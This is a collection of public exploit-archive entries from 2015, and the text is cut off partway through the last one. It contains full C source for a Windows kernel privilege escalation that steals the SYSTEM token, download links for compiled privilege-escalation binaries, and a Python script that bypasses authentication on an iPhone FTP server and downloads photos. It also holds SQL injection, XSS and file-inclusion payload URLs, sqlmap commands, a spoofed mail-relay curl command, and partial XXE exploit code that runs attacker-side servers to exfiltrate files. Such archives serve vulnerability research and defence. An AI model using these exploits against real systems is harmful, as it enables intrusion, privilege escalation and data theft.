Microsoft Windows - Local Privilege Escalation (MS15-051)
# Source: https://github.com/hfiref0x/CVE-2015-1701 Win32k LPE vulnerability used in APT attack Original info: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html Credits R136a1 / hfiref0x ## Compiled EXE: ### x86 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe + Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-32.exe ### x64 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe + Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-64.exe ## Source Code: + https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip + EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-src.zip
-
FTP Media Server 3.0 - Authentication Bypass / Denial of Service
#!/usr/bin/env python
#==================================================================================
# Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
# Date: 2015-05-25
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Exploit Author's Homepage: http://www.mikeallen.org
# Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
# Version: 3.0
# Tested on: iPhone
#==================================================================================
# ------------------
# Denial of Service:
# ------------------
# The FTP server does not properly handle errors raised by invalid
# FTP commands. The following command, which sends an invalid PORT command to
# the FTP server, will crash the server once it is received.
# echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000
# ----------------------
# Authentication Bypass:
# ----------------------
# The FTP server does not handle unauthenticated connections or incorrect login
# credentials properly. A remote user can issue commands to the FTP server
# without authenticating or after entering incorrect credentials.
# The following proof-of-concept connects to the given FTP server and
# downloads all files stored in the "Camera Roll" folder without providing a
# username or password:
#
# Script layout (Python 2): argv parsing, two callback helpers that collect
# LIST lines / RETR data chunks into module-level lists, then a plain ftplib
# session that never calls ftp.login() -- the missing login is the whole point
# of the demonstration, the rest is a stock ftplib client.
import sys
from ftplib import FTP

# NOTE(review): this guard only covers a missing host; a missing port still
# raises IndexError on the int(sys.argv[2]) line below.
if len(sys.argv) <= 1:
    print "Usage: ./ftp-nologin.py [host] [port]"
    exit()

host = sys.argv[1]
port = int(sys.argv[2])
files = []

def append_file(s):
    # retrlines callback: one LIST line per call; keep only the last
    # whitespace-separated token, i.e. the file name (breaks on names that
    # contain spaces -- verify against the server's LIST format).
    files.append(s.split(' ')[-1])

blocks = []

def get_blocks(d):
    # retrbinary callback: appends each raw data chunk to the module-level
    # `blocks` list that the download loop rebinds before every file.
    blocks.append(d)

ftp = FTP()
# connect() only opens the control channel; no USER/PASS is ever sent.
print ftp.connect(host, port)
ftp.set_pasv(1)
ftp.cwd("Camera Roll")
print ftp.retrlines('LIST', append_file)
# Drops the first LIST entry -- presumably a header or "." line; TODO confirm.
files.pop(0)
for filename in files:
    print "Downloading %s..." % filename
    ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)
    f = open(filename, 'wb')
    for block in blocks:
        f.write(block)
    f.close()
    print "[+] File saved to: %s" % filename
    # Rebind (not clear) so get_blocks starts on an empty list for the next file.
    blocks = []
ftp.quit()
-
Microsoft Windows - Local Privilege Escalation (MS15-010)
// ex.cpp /* Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP CVE-2015-0003 March 2015 (Public Release: May 24, 2015) Tested on: x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3 x64: Win 2k8 SP1 | Win 2k8 R2 SP1 Author: Skylake - skylake <at> mail <dot> com */ #include "ex.h" _ZwAllocateVirtualMemory ZwAllocateVirtualMemory; _PsLookupProcessByProcessId PsLookupProcessByProcessId; _PsReferencePrimaryToken PsReferencePrimaryToken; DWORD Pid; ATOM atom; BOOL KrnlMode, bSpawned; DWORD_PTR WINAPI pti() { #ifdef _M_X64 LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) ); #else LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) ); #endif } BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize ) { DWORD_PTR dwIndex, dwMask; #ifdef _M_X64 dwMask = ~0xf; #else dwMask = ~7; #endif // dwCurrentValue &= dwMask; for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ ) { if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue ) { // pdwStructure[dwIndex] = dwNewValue; return TRUE; } } return FALSE; } BOOL WINAPI Init() { HMODULE hMod = NULL; PVOID Base = NULL; OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) }; PSYSTEM_MODULE_INFORMATION pm = NULL; BOOL RetVal = FALSE; __try { if( !GetVersionEx( &ov ) ) __leave; if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 ) { atom = 0xc039; } else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 ) { atom = ( ov.dwMinorVersion == 1 ) ? 
0xc03c : 0xc03a; } if( !atom ) __leave; _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" ); if( !ZwQuerySystemInformation ) __leave; ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" ); if( !ZwAllocateVirtualMemory ) __leave; ULONG len; LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len ); if( !status ) __leave; pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len ); if( !pm ) __leave; status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len ); if( status ) __leave; CHAR szKrnl[MAX_PATH] = { 0 }, *t; for( ULONG i = 0; i < pm->Count; ++i ) { if( strstr( pm->Module[i].ImageName, "exe" ) ) { t = strstr( pm->Module[i].ImageName, "nt" ); if( t ) { strcpy_s( szKrnl, _countof( szKrnl ) - 1, t ); Base = pm->Module[i].Base; break; } } } hMod = LoadLibraryA( szKrnl ); if( !hMod || !Base ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" ); if( !PsLookupProcessByProcessId ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) ); PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" ); if( !PsReferencePrimaryToken ) __leave; PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) ); Pid = GetCurrentProcessId(); RetVal = TRUE; } __finally { if( pm ) LocalFree( pm ); if( hMod ) FreeLibrary( hMod ); } return RetVal; } LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam ) { LPVOID pCurProcess = NULL; LPVOID pSystemInfo = NULL; PACCESS_TOKEN systemToken; PACCESS_TOKEN targetToken; 
PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess ); PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo ); targetToken = PsReferencePrimaryToken( pCurProcess ); systemToken = PsReferencePrimaryToken( pSystemInfo ); // find_and_replace_member( ( PDWORD_PTR ) pCurProcess, ( DWORD_PTR ) targetToken, ( DWORD_PTR ) systemToken, 0x200 ); KrnlMode = TRUE; return 0; } VOID WINAPI leave() { keybd_event( VK_ESCAPE, 0, 0, NULL ); keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL ); keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL ); } LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam ) { if( bSpawned ) { leave(); ExitProcess( 0 ); } switch( message ) { case WM_CREATE: SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL ); FlashWindow( hWnd, TRUE ); keybd_event( VK_LWIN, 0, 0, NULL ); break; case WM_CLOSE: DestroyWindow( hWnd ); break; case WM_DESTROY: PostQuitMessage( 0 ); break; case WM_TIMER: KillTimer( hWnd, ID_TIMER ); leave(); DestroyWindow( hWnd ); break; default: return DefWindowProc( hWnd, message, wParam, lParam ); } return 0; } int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPTSTR lpCmdLine, _In_ int nCmdShow ) { WNDCLASSEX wc = { sizeof( WNDCLASSEX ) }; HWND hWnd = NULL; MSG Msg = { 0 }; SIZE_T size = 0x1000; LPVOID addr = ( LPVOID ) 1; if( !Init() ) return 1; if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) ) { // return 1; } DWORD_PTR p = pti(); if( !p ) return 1; #ifdef _M_X64 *( ( PDWORD_PTR ) 0x10 ) = p; *( ( LPBYTE ) 0x2a ) = 4; *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode; *( ( PDWORD_PTR ) 0xa8 ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( PDWORD_PTR ) 0x408 ) = 0x800; *( ( LPWORD ) 0x410 ) = atom; *( ( LPBYTE ) 0x412 ) = 1; #else *( ( LPDWORD ) 0x08 ) = p; *( ( LPBYTE ) 0x16 ) = 4; *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode; *( ( LPDWORD ) 0x6c ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( LPDWORD ) 0x408 ) = 
0x800; *( ( LPWORD ) 0x40c ) = atom; *( ( LPBYTE ) 0x40e ) = 1; #endif wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = TEXT( "Class" ); if( !RegisterClassEx( &wc ) ) return 1; hWnd = CreateWindowEx( WS_EX_CLIENTEDGE, TEXT( "Class" ), TEXT( "Window" ), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, NULL, NULL, hInstance, NULL ); if( !hWnd ) return 1; ShowWindow( hWnd, SW_HIDE ); UpdateWindow( hWnd ); while( GetMessage( &Msg, NULL, 0, 0 ) ) { if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010 { if( !KrnlMode ) { Msg.hwnd = ( HWND ) NULL; } else { Msg.hwnd = hWnd; if( !bSpawned ) { ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW ); bSpawned = TRUE; } } } TranslateMessage( &Msg ); DispatchMessage( &Msg ); } return ( int ) Msg.wParam; } // EOF //ex.h #pragma once #include <windows.h> #include <stdio.h> #include <tchar.h> typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect ); typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( _In_ HANDLE ProcessId, _Out_ PVOID *Process ); typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( _Inout_ PVOID Process ); typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation = 0, SystemModuleInformation = 11 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength ); typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { HANDLE Section; PVOID MappedBase; PVOID Base; ULONG Size; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct 
_SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; #define ID_TIMER 0x1 #define WM_SYSTIMER 0x118 // EOF
-
Waylu CMS - '/products_xx.php' SQL Injection / HTML Injection
source: https://www.securityfocus.com/bid/53202/info Waylu CMS is prone to an SQL-injection vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible. HTML Injection http://www.example.com/WebApps/products_xx.php?id=[XSS] SQL Injection http://www.example.com/WebApps/products_xx.php?id=[SQL Injection]
-
Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting
source: https://www.securityfocus.com/bid/53268/info concrete5 is prone to information-disclosure, SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to harvest sensitive information, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. concrete5 5.5.2.1 is vulnerable; other versions may also be affected. http://www.example.com/concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata http://www.example.com/concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form
-
Joomla! Component com_videogallery - Local File Inclusion / SQL Injection
source: https://www.securityfocus.com/bid/53237/info The Video Gallery component for Joomla! is prone to local file-include and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the affected application. Information harvested may aid in further attacks. The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. http://www.example.com/index.php?option=com_videogallery&Itemid=68' http://www.example.com/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]-- http://www.example.com/&controller=../../../../../../../../../../../../[LFT]%00
-
Joomla! Component CCNewsLetter 1.0.7 - 'id' SQL Injection
source: https://www.securityfocus.com/bid/53208/info The CCNewsLetter module for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. CCNewsLetter 1.0.7 is vulnerable; prior versions may also be affected. http://www.example.com/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
-
Quick.CMS 4.0 - 'p' Cross-Site Scripting
source: https://www.securityfocus.com/bid/53273/info Quick.CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Quick.CMS 4.0 is vulnerable; other versions may also be affected. http://www.example.com/admin/?p=[xss]
-
gpEasy 2.3.3 - 'jsoncallback' Cross-Site Scripting
source: https://www.securityfocus.com/bid/53269/info gpEasy is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. gpEasy 2.3.3 is vulnerable; other versions may also be affected. http://www.example.com/index.php/Admin_Preferences?gpreq=json&jsoncallback=<h1>test<br>test2<%2fh1>
-
WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress" # Author: Adrián M. F. - adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/newstatpress/ # Active installs: 20,000+ # Vulnerable version: 0.9.8 # Fixed version: 0.9.9 # CVE: CVE-2015-4062, CVE-2015-4063 Vulnerabilities (2) ===================== (1) Authenticated SQLi [CWE-89] (CVE-2015-4062) ----------------------------------------------- * CODE: includes/nsp_search.php:94 +++++++++++++++++++++++++++++++++++++++++ for($i=1;$i<=3;$i++) { if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) { $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'"; } } +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1 [............] GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] sqlmap identified the following injection points with a total of 89 HTTP(s) requests: --- Parameter: where1 (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search --- [12:25:59] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0.12 +++++++++++++++++++++++++++++++++++++++++ (2) Authenticated XSS [CWE-79] (CVE-2015-4063) ---------------------------------------------- includes/nsp_search.php:128 +++++++++++++++++++++++++++++++++++++++++ for($i=1;$i<=3;$i++) { if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; } } +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search Timeline ========== 2015-05-09: Discovered vulnerability. 2015-05-19: Vendor notification. 2015-05-19: Vendor response. 2015-05-20: Vendor fix. 2015-05-25: Public disclosure.
-
WordPress Plugin Video Gallery 2.8 - Arbitrary Mail Relay
###################### # Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page # Exploit Author : Claudio Viviani # Website Author: http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive) # Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip # Dork Google: index of "contus-video-gallery" # Date : 2015-04-05 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Video Gallery 2.8 suffers from an Unprotected Mail Page. This vulnerability can be exploited for DoS, phishing, mail bombing, spam, etc. The "email" ajax action is callable by any guest visitor (/contus-video-gallery/hdflvvideoshare.php) /** * Email function */ add_action( 'wp_ajax_email', 'email_function' ); add_action( 'wp_ajax_nopriv_email', 'email_function' ); function email_function() { require_once( dirname( __FILE__ ) . '/email.php' ); die(); } Any user can send email from /contus-video-gallery/email.php to any recipient. The variables used to send emails are: $to = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL ); $from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL ); $url = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL ); $subject = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING ); $message_content = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING ); $title = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING ); $referrer = parse_url( $_SERVER['HTTP_REFERER'] ); $referrer_host = $referrer['scheme'] . '://' . $referrer['host']; $pageURL = 'http'; It assumes that if the provided “Referrer” field matches the website’s URL, then it’s okay to send this email: if ( $referrer_host === $pageURL ) { $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; $headers .= "From: " . "<" . $from . 
">\r\n"; $headers .= "Reply-To: " . $from . "\r\n"; $headers .= "Return-path: " . $from; $username = explode('@' , $from ); $username = ucfirst($username['0']); $subject = $username . ' has shared a video with you.'; $emailtemplate_path = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html'; $message = file_get_contents( $emailtemplate_path); $message = str_replace( '{subject}', $subject, $message ); $message = str_replace( '{message}', $message_content, $message); $message = str_replace( '{videourl}',$url,$message ); $message = str_replace('{username}',$username ,$message ); if ( @mail( $to, $title, $message, $headers ) ) { echo 'success=sent'; } else { echo 'success=error'; } } else { echo 'success=error'; } The “Referer” field can easily be modified by the attacker! ###################### # PoC curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \ -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email cUrl switch "-e" spoof referer address # Http Response success=sent # Poc Video http://youtu.be/qgOGPm1-tNc ####################### Discovered By : Claudio Viviani http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit) http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################
-
WordPress Plugin Landing Pages 1.8.4 - Multiple Vulnerabilities
# Title: Multiple vulnerabilities in WordPress plugin "WordPress Landing Pages" # Author: Adrián M. F. - adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/landing-pages/ # Active installs: 20,000+ # Vulnerable version: 1.8.4 # Fixed version: 1.8.5 # CVE: CVE-2015-4064, CVE-2015-4065 Vulnerabilities (2) ===================== (1) Authenticated SQLi [CWE-89] (CVE-2015-4064) ----------------------------------------------- * CODE: modules/module.ab-testing.php:100 +++++++++++++++++++++++++++++++++++++++++ $wpdb->query(" SELECT `meta_key`, `meta_value` FROM $wpdb->postmeta WHERE `post_id` = ".$_GET['post']." "); +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/post.php?post=306[SQLi]&action=edit&lp-variation-id=1&ab-action=delete-variation SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/post.php?post=306&action=edit&lp-variation-id=0&ab-action=delete-variation" -p post [............] GET parameter 'post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 86 HTTP(s) requests: --- Parameter: post (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: post=306 AND (SELECT * FROM (SELECT(SLEEP(10)))sCKL)&action=edit&lp-variation-id=0&ab-action=delete-variation --- [13:35:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0.12 +++++++++++++++++++++++++++++++++++++++++ (2) Authenticated XSS [CWE-79] (CVE-2015-4065) ---------------------------------------------- * CODE: shared/shortcodes/inbound-shortcodes.php:761 +++++++++++++++++++++++++++++++++++++++++ <iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 
'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe> +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/post-new.php?post_type=inbound-forms&post='></iframe><script>alert(String.fromCharCode(88, 83, 83))</script> Timeline ========== 2015-05-09: Discovered vulnerability. 2015-05-20: Vendor notification. 2015-05-20: Vendor response. 2015-05-22: Vendor fix. 2015-05-25: Public disclosure.
-
Apache JackRabbit - WebDAV XML External Entity
#!/usr/bin/env python """ # Exploit Title: Jackrabbit WebDAV XXE # Date: 25-05-2015 # Software Link: http://jackrabbit.apache.org/jcr/ # Exploit Author: Mikhail Egorov # Contact: 0ang3el () gmail com # Website: http://0ang3el.blogspot.com # CVE: CVE-2015-1833 # Category: webapps 1. Description The Jackrabbit WebDAV plugin uses an insecurely configured XML parser to parse incoming PROPPATCH and PROPFIND requests. As a result, it is vulnerable to XXE attacks. Besides Jackrabbit JCR, the WebDAV plugin is incorporated into the following software: Apache Sling, Adobe AEM. 2. Proof of Concept Download the vulnerable Apache Sling launchpad web application from here - https://sling.apache.org Start the launchpad web application as follows: root@kali:~/build-sling# java -jar org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar Launch the exploit with the following command: root@kali:~# python cve-2015-1833.py --url http://127.0.0.1:8080/content/xxe --tech oob --ip 127.0.0.1 enter command> get . loaded 210 bytes in buffer enter command> show apache-maven-3.0.5 apache-maven-3.0.5-bin.tar.gz derby.log eclipse hs_err_pid5379.log org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar python-workspace enter command> store /tmp/cwd.lst buffer content has been stored in file /tmp/cwd.lst enter command> exit root@kali:~# The exploit has three exploitation techniques: * inb1 - inbound XXE technique; it first writes the content as an attribute value of a controllable JCR node using a PROPPATCH request and then retrieves the content using a PROPFIND request * inb2 - same as inb1, but with some XML magic to retrieve content that is not valid XML data * oob - out-of-band technique; utilizes the FTP hack from this blog http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html Technique inb2 is the most stable, but it requires the credentials of a user that is able to modify some JCR node. The attacker's host must have a "visible ip", which is required for communication between the target and the attacker's host. 
Technique oob works even with anonymous credentials. But it is not so stable as inb2 technique. Technique inb1 does not require "visible ip", but there are limitations on retrieved content. 3. Solution: If you use Apache Jackrabbit, install version 2.10.1. http://www.apache.org/dist/jackrabbit/2.10.1/RELEASE-NOTES.txt """ from urllib2 import * import sys, string, random import base64 import xml.etree.ElementTree as ET import BaseHTTPServer, SimpleHTTPServer from multiprocessing import Process, Value, Manager from optparse import OptionParser import socket, select usage= """ %prog --url <url> --tech inb1 [ --creds <creds> ] %prog --url <url> --tech inb2 --ip <ip> [ --creds <creds> --hport <hport> ] %prog --url <url> --tech oob --ip <ip> [ --creds <creds> --hport <hport> --fport <fport>] """ help_interpreter = """ help - print this help. get <dir or file> - retrieve directory listing or file content and store it inside internal buffer. You can use "." to denote current directory (e.g. use "get ." for cwd listing). show - show content of internal buffer. store <out file> - store internal buffer in file. exit - stop exploiting """ failure_descr = """ Possible reasons: 1. Inappropriate technique, try another options. 2. You do not have permissions to read file or list directory. 3. Target is not exploitable. 
""" rand_attr = '' script_name = sys.argv[0].split('/')[-1] buffer_with_loot = '' url, tech, ip, creds, hport, fport = [None] * 6 http_server, ftp_server = [None] * 2 class HTTP_XXE(): def __init__(self, ip, port, fport): self.port = port self.ip = ip self.fport = fport def run(self): class http_handler(BaseHTTPServer.BaseHTTPRequestHandler): def __init__(self, ip, fport,*args): self.ip = ip self.fport = fport BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args) def do_GET(self): if "inb2" in self.path: self.send_response(200) self.send_header('Content-type','application/xml') self.end_headers() self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY all "%start;%loot;%end;">') if "oob" in self.path: self.send_response(200) self.send_header('Content-type','application/xml') self.end_headers() self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY %% all "<!ENTITY % send SYSTEM "ftp://%(ip)s:%(port)s/%%loot;">">%%all;' % {'ip' : self.ip, 'port' : self.fport}) def log_message(self, format, *args): # silent HTTP server return def serve(httpd): while True: httpd.handle_request() handler = lambda *args: http_handler(self.ip, self.fport, *args) httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', self.port), handler) self.proc = Process(target = serve, args = (httpd,)) self.proc.start() def stop(self): self.proc.terminate() class FTP_XXE(): def __init__(self, port): self.port = port def run(self): class ftp_handler(): def __init__(self, port): self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.server.setblocking(0) self.server.bind(('0.0.0.0', port)) self.server.listen(5) def serve(self, d): inputs = [self.server] while True: readable, writable, exceptional = select.select(inputs, [], []) for s in readable: if s is self.server: connection, client_address = s.accept() connection.setblocking(0) inputs.append(connection) connection.send("220 xxe-ftp-server\n") else: data = 
